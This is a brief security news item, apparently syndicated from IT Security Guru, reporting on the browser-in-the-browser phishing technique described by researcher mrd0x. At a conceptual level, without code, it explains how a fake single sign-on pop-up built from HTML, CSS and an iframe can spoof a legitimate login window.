A new phishing technique dubbed browser-in-the-browser (BitB) attack allows threat actors to simulate a browser window within a browser, spoofing a legitimate domain and initiating a convincing phishing attack.
A penetration tester and security researcher, known as mrd0x on Twitter, explained how the method takes advantage of third-party single sign-on (SSO) options on websites such as “Sign in with Google” (or Facebook, Apple, or Microsoft).
The default behaviour sign in methods such as these is to greet users with a pop-up window to complete the authentication process. BitB attacks aim to replicate this process using a mix HTML and CSS code, presenting users with a fabricated browser window.
“Combine the window design with an iframe pointing to the malicious server hosting the phishing page, and it’s basically indistinguishable,” mrd0x said in a technical write-up published last week. “JavaScript can be easily used to make the window appear on a link or button click, on the page loading etc.”
The post New attack technique makes phishing near undetectable appeared first on IT Security Guru.
Support the originator by clicking the read the rest link below.
